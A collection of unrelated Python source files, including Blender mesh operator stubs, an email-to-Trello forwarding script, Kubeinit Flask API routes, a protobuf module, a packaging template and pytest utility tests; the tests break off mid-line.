use_non_contiguous: bool = True, use_verts: bool = True): '''Select all non-manifold vertices or edges :param extend: Extend, Extend the selection :type extend: bool :param use_wire: Wire, Wire edges :type use_wire: bool :param use_boundary: Boundaries, Boundary edges :type use_boundary: bool :param use_multi_face: Multiple Faces, Edges shared by 3+ faces :type use_multi_face: bool :param use_non_contiguous: Non Contiguous, Edges between faces pointing in alternate directions :type use_non_contiguous: bool :param use_verts: Vertices, Vertices connecting multiple face regions :type use_verts: bool ''' pass def select_nth(skip: int = 1, nth: int = 1, offset: int = 0): '''Deselect every Nth element starting from the active vertex, edge or face :param skip: Deselected, Number of deselected elements in the repetitive sequence :type skip: int :param nth: Selected, Number of selected elements in the repetitive sequence :type nth: int :param offset: Offset, Offset from the starting point :type offset: int ''' pass def select_prev_item(): '''Select the previous element (using selection order) ''' pass def select_random(percent: float = 50.0, seed: int = 0, action: typing.Union[int, str] = 'SELECT'): '''Randomly select vertices :param percent: Percent, Percentage of objects to select randomly :type percent: float :param seed: Random Seed, Seed for the random number generator :type seed: int :param action: Action, Selection action to executeSELECT Select, Select all elements.DESELECT Deselect, Deselect all elements. :type action: typing.Union[int, str] ''' pass def select_similar(type: typing.Union[int, str] = 'NORMAL', compare: typing.Union[int, str] = 'EQUAL', threshold: float = 0.0): '''Select similar vertices, edges or faces by property types :param type: Type :type type: typing.Union[int, str] :param compare: Compare :type compare: typing.Union[int, str] :param threshold: Threshold :type threshold: float ''' pass def select_similar_region(): '''Select similar face regions to the current selection ''' pass def select_ungrouped(extend: bool = False): '''Select vertices without a group :param extend: Extend, Extend the selection :type extend: bool ''' pass def separate(type: typing.Union[int, str] = 'SELECTED'): '''Separate selected geometry into a new mesh :param type: Type :type type: typing.Union[int, str] ''' pass def set_normals_from_faces(keep_sharp: bool = False): '''Set the custom normals from the selected faces ones :param keep_sharp: Keep Sharp Edges, Do not set sharp edges to face :type keep_sharp: bool ''' pass def shape_propagate_to_all(): '''Apply selected vertex locations to all other shape keys ''' pass def shortest_path_pick(edge_mode: typing.Union[int, str] = 'SELECT', use_face_step: bool = False, use_topology_distance: bool = False, use_fill: bool = False, skip: int = 0, nth: int = 1, offset: int = 0, index=-1): '''Select shortest path between two selections :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path :type edge_mode: typing.Union[int, str] :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) :type use_face_step: bool :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance :type use_topology_distance: bool :param use_fill: Fill Region, Select all paths between the source/destination elements :type use_fill: bool :param skip: Deselected, Number of deselected elements in the repetitive sequence :type skip: int :param nth: Selected, Number of selected elements in the repetitive sequence :type nth: int :param offset: Offset, Offset from the starting point :type offset: int ''' pass def shortest_path_select(edge_mode: typing.Union[int, str] = 'SELECT', use_face_step: bool = False, use_topology_distance: bool = False, use_fill: bool = False, skip: int = 0, nth: int = 1, offset: int = 0): '''Selected shortest path between two vertices/edges/faces :param edge_mode: Edge Tag, The edge flag to tag when selecting the shortest path :type edge_mode: typing.Union[int, str] :param use_face_step: Face Stepping, Traverse connected faces (includes diagonals and edge-rings) :type use_face_step: bool :param use_topology_distance: Topology Distance, Find the minimum number of steps, ignoring spatial distance :type use_topology_distance: bool :param use_fill: Fill Region, Select all paths between the source/destination elements :type use_fill: bool :param skip: Deselected, Number of deselected elements in the repetitive sequence :type skip: int :param nth: Selected, Number of selected elements in the repetitive sequence :type nth: int :param offset: Offset, Offset from the starting point :type offset: int ''' pass def smoothen_normals(factor: float = 0.5): '''Smoothen custom normals based on adjacent vertex normals :param factor: Factor, Specifies weight of smooth vs original normal :type factor: float ''' pass def solidify(thickness: float = 0.01): '''Create a solid skin by extruding, compensating for sharp angles :param thickness: Thickness :type thickness: float ''' pass def sort_elements(type: typing.Union[int, str] = 'VIEW_ZAXIS', elements: typing.Set[typing.Union[int, str]] = {'VERT'}, reverse: bool = False, seed: int = 0): '''The order of selected vertices/edges/faces is modified, based on a given method :param type: Type, Type of re-ordering operation to applyVIEW_ZAXIS View Z Axis, Sort selected elements from farthest to nearest one in current view.VIEW_XAXIS View X Axis, Sort selected elements from left to right one in current view.CURSOR_DISTANCE Cursor Distance, Sort selected elements from nearest to farthest from 3D cursor.MATERIAL Material, Sort selected elements from smallest to greatest material index (faces only!).SELECTED Selected, Move all selected elements in first places, preserving their relative order (WARNING: this will affect unselected elements’ indices as well!).RANDOMIZE Randomize, Randomize order of selected elements.REVERSE Reverse, Reverse current order of selected elements. :type type: typing.Union[int, str] :param elements: Elements, Which elements to affect (vertices, edges and/or faces) :type elements: typing.Set[typing.Union[int, str]] :param reverse: Reverse, Reverse the sorting effect :type reverse: bool :param seed: Seed, Seed for random-based operations :type seed: int ''' pass def spin(steps: int = 9, dupli: bool = False, angle: float = 1.5708, use_auto_merge: bool = True, use_normal_flip: bool = False, center: float = (0.0, 0.0, 0.0), axis: float = (0.0, 0.0, 0.0)): '''Extrude selected vertices in a circle around the cursor in indicated viewport :param steps: Steps, Steps :type steps: int :param dupli: Use Duplicates :type dupli: bool :param angle: Angle, Rotation for each step :type angle: float :param use_auto_merge: Auto Merge, Merge first/last when the angle is a full revolution :type use_auto_merge: bool :param use_normal_flip: Flip Normals :type use_normal_flip: bool :param center: Center, Center in global view space :type center: float :param axis: Axis, Axis in global view space :type axis: float ''' pass def split(): '''Split off selected geometry from connected unselected geometry ''' pass def split_normals(): '''Split custom normals of selected vertices ''' pass def subdivide(number_cuts: int = 1, smoothness: float = 0.0, ngon: bool = True, quadcorner: typing.Union[int, str] = 'STRAIGHT_CUT', fractal: float = 0.0, fractal_along_normal: float = 0.0, seed: int = 0): '''Subdivide selected edges :param number_cuts: Number of Cuts :type number_cuts: int :param smoothness: Smoothness, Smoothness factor :type smoothness: float :param ngon: Create N-Gons, When disabled, newly created faces are limited to 3-4 sided faces :type ngon: bool :param quadcorner: Quad Corner Type, How to subdivide quad corners (anything other than Straight Cut will prevent ngons) :type quadcorner: typing.Union[int, str] :param fractal: Fractal, Fractal randomness factor :type fractal: float :param fractal_along_normal: Along Normal, Apply fractal displacement along normal only :type fractal_along_normal: float :param seed: Random Seed, Seed for the random number generator :type seed: int ''' pass def subdivide_edgering(number_cuts: int = 10, interpolation: typing.Union[int, str] = 'PATH', smoothness: float = 1.0, profile_shape_factor: float = 0.0, profile_shape: typing.Union[int, str] = 'SMOOTH'): '''Subdivide perpendicular edges to the selected edge ring :param number_cuts: Number of Cuts :type number_cuts: int :param interpolation: Interpolation, Interpolation method :type interpolation: typing.Union[int, str] :param smoothness: Smoothness, Smoothness factor :type smoothness: float :param profile_shape_factor: Profile Factor, How much intermediary new edges are shrunk/expanded :type profile_shape_factor: float :param profile_shape: Profile Shape, Shape of the profileSMOOTH Smooth, Smooth falloff.SPHERE Sphere, Spherical falloff.ROOT Root, Root falloff.INVERSE_SQUARE Inverse Square, Inverse Square falloff.SHARP Sharp, Sharp falloff.LINEAR Linear, Linear falloff. :type profile_shape: typing.Union[int, str] ''' pass def symmetrize(direction: typing.Union[int, str] = 'NEGATIVE_X', threshold: float = 0.0001): '''Enforce symmetry (both form and topological) across an axis :param direction: Direction, Which sides to copy from and to :type direction: typing.Union[int, str] :param threshold: Threshold, Limit for snap middle vertices to the axis center :type threshold: float ''' pass def symmetry_snap(direction: typing.Union[int, str] = 'NEGATIVE_X', threshold: float = 0.05, factor: float = 0.5, use_center: bool = True): '''Snap vertex pairs to their mirrored locations :param direction: Direction, Which sides to copy from and to :type direction: typing.Union[int, str] :param threshold: Threshold, Distance within which matching vertices are searched :type threshold: float :param factor: Factor, Mix factor of the locations of the vertices :type factor: float :param use_center: Center, Snap middle vertices to the axis center :type use_center: bool ''' pass def tris_convert_to_quads(face_threshold: float = 0.698132, shape_threshold: float = 0.698132, uvs: bool = False, vcols: bool = False, seam: bool = False, sharp: bool = False, materials: bool = False): '''Join triangles into quads :param face_threshold: Max Face Angle, Face angle limit :type face_threshold: float :param shape_threshold: Max Shape Angle, Shape angle limit :type shape_threshold: float :param uvs: Compare UVs :type uvs: bool :param vcols: Compare VCols :type vcols: bool :param seam: Compare Seam :type seam: bool :param sharp: Compare Sharp :type sharp: bool :param materials: Compare Materials :type materials: bool ''' pass def unsubdivide(iterations: int = 2): '''UnSubdivide selected edges & faces :param iterations: Iterations, Number of times to unsubdivide :type iterations: int ''' pass def uv_texture_add(): '''Add UV Map ''' pass def uv_texture_remove(): '''Remove UV Map ''' pass def uvs_reverse(): '''Flip direction of UV coordinates inside faces ''' pass def uvs_rotate(use_ccw: bool = False): '''Rotate UV coordinates inside faces :param use_ccw: Counter Clockwise :type use_ccw: bool ''' pass def vert_connect(): '''Connect selected vertices of faces, splitting the face ''' pass def vert_connect_concave(): '''Make all faces convex ''' pass def vert_connect_nonplanar(angle_limit: float = 0.0872665): '''Split non-planar faces that exceed the angle threshold :param angle_limit: Max Angle, Angle limit :type angle_limit: float ''' pass def vert_connect_path(): '''Connect vertices by their selection order, creating edges, splitting faces ''' pass def vertex_color_add(): '''Add vertex color layer ''' pass def vertex_color_remove(): '''Remove vertex color layer ''' pass def vertices_smooth(factor: float = 0.5, repeat: int = 1, xaxis: bool = True, yaxis: bool = True, zaxis: bool = True): '''Flatten angles of selected vertices :param factor: Smoothing, Smoothing factor :type factor: float :param repeat: Repeat, Number of times to smooth the mesh :type repeat: int :param xaxis: X-Axis, Smooth along the X axis :type xaxis: bool :param yaxis: Y-Axis, Smooth along the Y axis :type yaxis: bool :param zaxis: Z-Axis, Smooth along the Z axis :type zaxis: bool ''' pass def vertices_smooth_laplacian(repeat: int = 1, lambda_factor: float = 1.0, lambda_border: float = 5e-05, use_x: bool = True, use_y: bool = True, use_z: bool = True, preserve_volume: bool = True): '''Laplacian smooth of selected vertices :param repeat: Number of iterations to smooth the mesh :type repeat: int :param lambda_factor: Lambda factor :type lambda_factor: float :param lambda_border: Lambda factor in border :type lambda_border: float :param use_x: Smooth X Axis, Smooth object along X axis :type use_x: bool :param use_y: Smooth Y Axis, Smooth object along Y axis :type use_y: bool :param use_z: Smooth Z Axis, Smooth object along Z axis :type use_z: bool :param preserve_volume: Preserve Volume, Apply volume preservation after smooth :type preserve_volume: bool ''' pass def wireframe(use_boundary: bool = True, use_even_offset: bool = True, use_relative_offset: bool = False, use_replace: bool = True, thickness: float = 0.01, offset: float = 0.01, use_crease: bool = False, crease_weight: float = 0.01): '''Create a solid wire-frame from faces :param use_boundary: Boundary, Inset face boundaries :type use_boundary: bool :param use_even_offset: Offset Even, Scale the offset to give more even thickness :type use_even_offset: bool :param use_relative_offset: Offset Relative, Scale the offset by surrounding geometry :type use_relative_offset: bool :param use_replace: Replace, Remove original faces :type use_replace: bool :param thickness: Thickness :type thickness: float :param offset: Offset :type offset: float :param use_crease: Crease, Crease hub edges for improved subsurf :type use_crease: bool :param crease_weight: Crease weight :type crease_weight: float ''' pass
from imbox import Imbox import html2text import requests import json import time with open('config.json') as config_file: data = json.load(config_file) API_KEY = data['API_KEY'] OAUTH_TOKEN = data['OAUTH_TOKEN'] trello_list_id = data['trello_list_id'] # SSL Context docs https://docs.python.org/3/library/ssl.html#ssl.create_default_context def get_text(content): html = (str(content)) text_maker = html2text.HTML2Text() text_maker.ignore_links = True text_maker.bypass_tables = False text = text_maker.handle(html) # Slice everything that comes between html': and ]} start = "html':" end = "]}" mail_content = text[text.find(start) + len(start):text.rfind(end)] # Normalize content, removing unknown chars mail_content = mail_content.replace("['","") mail_content = mail_content.replace('\\xa0', ' ') mail_content = mail_content.replace("\\r\\n'","") return mail_content def send_to_trello(mail_content,subject): r = requests.post("https://api.trello.com/1/cards?key=" + \ API_KEY + "&token=" + OAUTH_TOKEN + \ "&name=" + subject + "&idList=" + \ trello_list_id + "&desc=" + \ mail_content) return r with Imbox('imap.gmail.com', username = data['mail_username'], password = data['mail_password'], ssl = True, ssl_context = None, starttls = False) as imbox: fetch_mail_type = imbox.messages(sent_from = data['mail_from_username']) # Get all folders #status, folders_with_additional_info = imbox.folders() # Gets all messages from the inbox #all_inbox_messages = imbox.messages() for uid, message in fetch_mail_type: # Every message is an object with the following keys origin = message.sent_from receiver = message.sent_to subject = message.subject headers = message.headers message_id = message.message_id message_date = message.date content = message.body message_attachments = message.attachments result = get_text(content) response = send_to_trello(result,subject) if response.status_code == 200: #imbox.mark_seen(uid) imbox.delete(uid) time.sleep(1)
#!/usr/bin/env python """ Copyright 2019 Kubeinit (kubeinit.com). Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ import app from app import version as kubeinit_ui_version from app.base import blueprint from app.base.k8sclient import (cluster_name_configured, state_namespaces, state_nodes, state_pods, web_terminal) from flask import jsonify, redirect, render_template, request, url_for # , session # from flask_login import (current_user, # login_required, # login_user, # logout_user) from google.cloud import firestore from pystol.lister import list_actions, show_actions KUBEINIT_VERSION = kubeinit_ui_version.__version__ # # Begin authentication # try: from app.auth.routes import get_session_data # from app.auth.util import remote_cluster except ImportError: print("Module not available") try: fdb = firestore.Client() transaction = fdb.transaction() except Exception as e: print("Cant connect to firestore: %s" % (e)) # # End authentication # @blueprint.route('/error-<error>') def route_errors(error): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return render_template('errors/{}.html'.format(error)) # API endpoints @blueprint.route('/api/v1/ListActions', methods=['GET']) def api_list_actions(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(list_actions()) @blueprint.route('/api/v1/ShowActions', methods=['GET']) def api_show_actions(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(show_actions()) @blueprint.route('/api/v1/StateNamespaces', methods=['GET']) def api_state_namespaces(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(state_namespaces()) @blueprint.route('/api/v1/StateNodes', methods=['GET']) def api_state_nodes(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(state_nodes()) @blueprint.route('/api/v1/StatePods', methods=['GET']) def api_state_pods(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(state_pods()) @blueprint.route('/api/v1/Terminal', methods=['GET']) def api_web_terminal(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(web_terminal()) @blueprint.route('/api/v1/ClusterName', methods=['GET']) def api_cluster_name_configured(): """ Define a route. This is a main routing method """ # # Basic authentication module requirement # If the auth module is installed and the user is not authenticated, so go to login # session = {} if hasattr(app, 'auth'): try: session = get_session_data(transaction=transaction, session_id=request.cookies.get('session_id')) except Exception as e: print(e) return redirect(url_for('auth_blueprint.login')) else: session['kubeconfig'] = None # not current_user.is_authenticated: if hasattr(app, 'auth') and session['email'] is None: return redirect(url_for('auth_blueprint.login')) # # End basic authentication requirement # return jsonify(cluster_name_configured()) @blueprint.route('/shutdown') def shutdown(): """ Define a route. This is a main routing method """ func = request.environ.get('werkzeug.server.shutdown') if func is None: raise RuntimeError('Not running with the Werkzeug Server') func() return 'Server shutting down...' @blueprint.errorhandler(404) def not_found_error(error): """ Define a route. This is a main routing method """ return render_template('page-404.html', template_folder="../home/templates/"), 404 @blueprint.errorhandler(404) def internal_error(error): """ Define a route. This is a main routing method """ return render_template('page-500.html', template_folder="../home/templates/"), 500 # Errors # @login_manager.unauthorized_handler # def unauthorized_handler(): # """ # Define a route. # # This is a main routing method # """ # return render_template('page-403.html', # template_folder="../home/templates/"), 403 # @blueprint.errorhandler(403) # def access_forbidden(error): # """ # Define a route. # # This is a main routing method # """ # return render_template('page-403.html', # template_folder="../home/templates/"), 403
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: communicator_objects/brain_type_proto.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf.internal import enum_type_wrapper from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() #from communicator_objects import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2 import resolution_proto_pb2 as communicator__objects_dot_resolution__proto__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='communicator_objects/brain_type_proto.proto', package='communicator_objects', syntax='proto3', serialized_pb=_b('\n+communicator_objects/brain_type_proto.proto\x12\x14\x63ommunicator_objects\x1a+communicator_objects/resolution_proto.proto*G\n\x0e\x42rainTypeProto\x12\n\n\x06Player\x10\x00\x12\r\n\tHeuristic\x10\x01\x12\x0c\n\x08\x45xternal\x10\x02\x12\x0c\n\x08Internal\x10\x03\x42\x1f\xaa\x02\x1cMLAgents.CommunicatorObjectsb\x06proto3') , dependencies=[communicator__objects_dot_resolution__proto__pb2.DESCRIPTOR,]) _BRAINTYPEPROTO = _descriptor.EnumDescriptor( name='BrainTypeProto', full_name='communicator_objects.BrainTypeProto', filename=None, file=DESCRIPTOR, values=[ _descriptor.EnumValueDescriptor( name='Player', index=0, number=0, options=None, type=None), _descriptor.EnumValueDescriptor( name='Heuristic', index=1, number=1, options=None, type=None), _descriptor.EnumValueDescriptor( name='External', index=2, number=2, options=None, type=None), _descriptor.EnumValueDescriptor( name='Internal', index=3, number=3, options=None, type=None), ], containing_type=None, options=None, serialized_start=114, serialized_end=185, ) _sym_db.RegisterEnumDescriptor(_BRAINTYPEPROTO) BrainTypeProto = enum_type_wrapper.EnumTypeWrapper(_BRAINTYPEPROTO) Player = 0 Heuristic = 1 External = 2 Internal = 3 DESCRIPTOR.enum_types_by_name['BrainTypeProto'] = _BRAINTYPEPROTO _sym_db.RegisterFileDescriptor(DESCRIPTOR) DESCRIPTOR.has_options = True DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\252\002\034MLAgents.CommunicatorObjects')) # @@protoc_insertion_point(module_scope)
import pylab class Animal: def __init__(self, name, egg_laying, scales, poisonous, cold_blood, legs, reptile): self.name = name self.egg_laying = egg_laying self.scales = scales self.poisonous = poisonous self.legs = legs self.cold_blood = cold_blood self.reptile = reptile def get_name(self): return self.name def distance(self, another_animal): distance = 0 if self.egg_laying != another_animal.egg_laying: distance += 1 if self.scales != another_animal.scales: distance += 1 if self.poisonous != another_animal.poisonous: distance += 1 if self.legs != another_animal.legs: distance += 1 if self.cold_blood != another_animal.cold_blood: distance += 1 if self.reptile != another_animal.reptile: distance += 1 return distance def __str__(self): return self.name def std_dev(l): if len(l) == 0: return float('NaN') summ = 0 for i in l: summ += len(i) mean = summ / float(len(l)) tot = 0.0 for i in l: tot += (len(i) - mean) ** 2 std = (tot / len(l)) ** 0.5 return std def z_scale_features(vals): result = pylab.array(vals) mean = float(sum(vals)) / len(vals) result = result - mean return result / std_dev(result) def i_scale_features(vals): min_vals, max_vals = min(vals), max(vals) fit = pylab.polyfit([min_vals, max_vals], [0, 1], 1) return pylab.polyval(fit, vals) animals = [Animal('cobra', 1, 1, 1, 1, 0, 1), Animal('rattlesnake', 1, 1, 1, 1, 0, 1), Animal('boa constrictor', 0, 1, 0, 1, 0, 1), Animal('chicken', 1, 1, 0, 1, 2, 0), Animal('guppy', 0, 1, 0, 0, 0, 0), Animal('dart frog', 1, 0, 1, 0, 4, 0), Animal('zebra', 0, 0, 0, 0, 4, 0), Animal('python', 1, 1, 0, 1, 0, 1), Animal('alligator', 1, 1, 0, 1, 4, 1)] def distance_matrix(animals, precision): column_label = [] for a in animals: column_label.append(a.get_name()) row_label = column_label[:] table_vals = [] # Get distance between pairs of animals for a1 in animals: row = [] for a2 in animals: if a1 == a2: row.append('--') else: distance = a1.distance(a2) row.append(str(round(distance, precision))) table_vals.append(row) table = pylab.table(rowLabels=row_label, colLabels=column_label, cellText=table_vals, cellLoc='center', loc='center', colWidths=[0.138] * len(animals)) table.scale(1, 2.5) pylab.axis('off') pylab.savefig('distance') distance_matrix(animals, 3)
#!/usr/bin/env python # -*- coding: utf-8 -*- # Note: To use the 'upload' functionality of this file, you must: # $ pipenv install twine --dev import io import os import sys from shutil import rmtree from setuptools import find_packages, setup, Command # Package meta-data. NAME = 'mypackage' DESCRIPTION = 'My short description for my project.' URL = 'https://github.com/me/myproject' EMAIL = '[email protected]' AUTHOR = 'Awesome Soul' REQUIRES_PYTHON = '>=3.8.0' VERSION = '0.1.0' # What packages are required for this module to be executed? REQUIRED = [ # 'requests', 'maya', 'records', ] # What packages are optional? EXTRAS = { # 'fancy feature': ['django'], } # The rest you shouldn't have to touch too much :) # ------------------------------------------------ # Except, perhaps the License and Trove Classifiers! # If you do change the License, remember to change the Trove Classifier for that! here = os.path.abspath(os.path.dirname(__file__)) # Import the README and use it as the long-description. # Note: this will only work if 'README.md' is present in your MANIFEST.in file! try: with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f: long_description = '\n' + f.read() except FileNotFoundError: long_description = DESCRIPTION # Load the package's __version__.py module as a dictionary. about = {} if not VERSION: project_slug = NAME.lower().replace("-", "_").replace(" ", "_") with open(os.path.join(here, project_slug, '__version__.py')) as f: exec(f.read(), about) else: about['__version__'] = VERSION class UploadCommand(Command): """Support setup.py upload.""" description = 'Build and publish the package.' user_options = [] @staticmethod def status(s): """Prints things in bold.""" print('\033[1m{0}\033[0m'.format(s)) def initialize_options(self): pass def finalize_options(self): pass def run(self): try: self.status('Removing previous builds…') rmtree(os.path.join(here, 'dist')) except OSError: pass self.status('Building Source and Wheel (universal) distribution…') os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable)) self.status('Uploading the package to PyPI via Twine…') os.system('twine upload dist/*') self.status('Pushing git tags…') os.system('git tag v{0}'.format(about['__version__'])) os.system('git push --tags') sys.exit() # Where the magic happens: setup( name=NAME, version=about['__version__'], description=DESCRIPTION, long_description=long_description, long_description_content_type='text/markdown', author=AUTHOR, author_email=EMAIL, python_requires=REQUIRES_PYTHON, url=URL, packages=find_packages(exclude=["tests", "*.tests", "*.tests.*", "tests.*"]), # If your package is a single module, use this instead of 'packages': # py_modules=['mypackage'], # entry_points={ # 'console_scripts': ['mycli=mymodule:cli'], # }, install_requires=REQUIRED, extras_require=EXTRAS, include_package_data=True, license='MIT', classifiers=[ # Trove classifiers # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers 'License :: OSI Approved :: MIT License', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy' ], # $ setup.py publish support. cmdclass={ 'upload': UploadCommand, }, )
class ResampleQuality: r"""Quality levels for resampling.""" QUICK = 'q' LOW = 'l' MEDIUM = 'm' HIGH = 'h' VERY_HIGH = 'v'
#!/usr/bin/env python3 import pytest # type: ignore import os import time import random import pathlib import numpy as np # type: ignore import numpy from glob import iglob from pathlib import Path import rtCommon.utils as utils # type: ignore import rtCommon.projectUtils as putils # type: ignore import rtCommon.validationUtils as vutils # type: ignore from rtCommon.structDict import MatlabStructDict # type: ignore from rtCommon.addLogin import addUserPassword from rtCommon.webHttpHandlers import loadPasswdFile @pytest.fixture(scope="module") def matTestFilename(): # type: ignore return os.path.join(os.path.dirname(__file__), 'test_input/teststruct.mat') class TestFindNewestFile: TEST_BASE_FILENAME = '/tmp/testdir/file1_20170101T01010' NUM_TEST_FILES = 5 def setup_class(cls): # create tmp directory if it doesn't exist pathlib.Path('/tmp/testdir/').mkdir(parents=True, exist_ok=True) # check if test files already exist, get the count of them count_testfiles = sum(1 for _ in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*")) if count_testfiles != TestFindNewestFile.NUM_TEST_FILES: # remove any existing testfiles for filename in iglob(TestFindNewestFile.TEST_BASE_FILENAME + "*"): os.remove(filename) # create the correct number of test files for i in range(TestFindNewestFile.NUM_TEST_FILES): filename = TestFindNewestFile.TEST_BASE_FILENAME + str(i) with open(filename, 'w') as fp: fp.write("test file") time.sleep(1) def assert_result_matches_filename(self, filename): assert filename == (self.TEST_BASE_FILENAME + str(self.NUM_TEST_FILES - 1)) def test_normalCase(self): print("Test findNewestFile normal case:") filename = utils.findNewestFile('/tmp/testdir', 'file1_20170101*') self.assert_result_matches_filename(filename) def test_emptyPath(self): print("Test findNewestFile empty path:") filename = utils.findNewestFile('', '/tmp/testdir/file1_20170101*') self.assert_result_matches_filename(filename) def test_pathInPattern(self): print("Test findNewestFile path embedded in pattern:") filename = utils.findNewestFile( '/tmp/testdir', '/tmp/testdir/file1_20170101*') self.assert_result_matches_filename(filename) def test_pathPartiallyInPattern(self): print("Test findNewestFile path partially in pattern:") filename = utils.findNewestFile('/tmp', 'testdir/file1_20170101*') self.assert_result_matches_filename(filename) def test_noMatchingFiles(self): print("Test findNewestFile no matching files:") filename = utils.findNewestFile('/tmp/testdir/', 'no_such_file') assert filename is None class TestCompareArrays: A = None B = None max_deviation = .01 def setup_class(cls): arrayDims = [40, 50, 60] A = np.random.random(arrayDims) delta = np.random.random(arrayDims) * TestCompareArrays.max_deviation B = A + (A * delta) TestCompareArrays.A = A TestCompareArrays.B = B def test_compareArrays(self): print("Test compareArrays") # import pdb; pdb.set_trace() result = vutils.compareArrays(self.B, self.A) assert result['mean'] < 2 / 3 * self.max_deviation assert result['max'] < self.max_deviation return def test_areArraysClose(self): print("Test areArraysClose") max_mean = 2 / 3 * self.max_deviation assert vutils.areArraysClose(self.B, self.A, mean_limit=max_mean) return class TestCompareMatStructs: A = None B = None max_deviation = .01 def setup_class(cls): def delta(val): return val + (val * random.random() * TestCompareMatStructs.max_deviation) A = MatlabStructDict( {'sub': MatlabStructDict({})}, 'sub') A.str1 = "hello" A.a1 = 6.0 A.sub.a2 = np.array([1, 2, 3, 4, 5], dtype=np.float) A.sub.b2 = 7.0 A.sub.str2 = "world" B = MatlabStructDict( {'sub': MatlabStructDict({})}, 'sub') B.str1 = "hello" B.a1 = delta(A.a1) B.sub.a2 = delta(A.a2) B.sub.b2 = delta(A.b2) B.sub.str2 = "world" TestCompareMatStructs.A = A TestCompareMatStructs.B = B def test_compareMatStructs_all_fields(self): print("Test compareMatStructs_all_fields") result = vutils.compareMatStructs(self.A, self.B) means = [result[key]['mean'] for key in result.keys()] assert len(means) == 5 assert all(mean < self.max_deviation for mean in means) def test_compareMatStructs_field_subset(self): print("Test compareMatStructs_field_subset") result = vutils.compareMatStructs(self.A, self.B, ['a2', 'str1']) means = [result[key]['mean'] for key in result.keys()] assert len(means) == 2 assert all(mean < self.max_deviation for mean in means) def test_isMeanWithinThreshold(self): a = {'val1': {'mean': .1, 'max': .2}, 'val2': {'mean': .05, 'max': .075}} assert vutils.isMeanWithinThreshold(a, .11) assert not vutils.isMeanWithinThreshold(a, .09) class TestValidationUtils: def test_compareMatFiles(self, matTestFilename): res = vutils.compareMatFiles(matTestFilename, matTestFilename) assert vutils.isMeanWithinThreshold(res, 0) def test_pearsonsMeanCorr(self): n1 = np.array([[1, 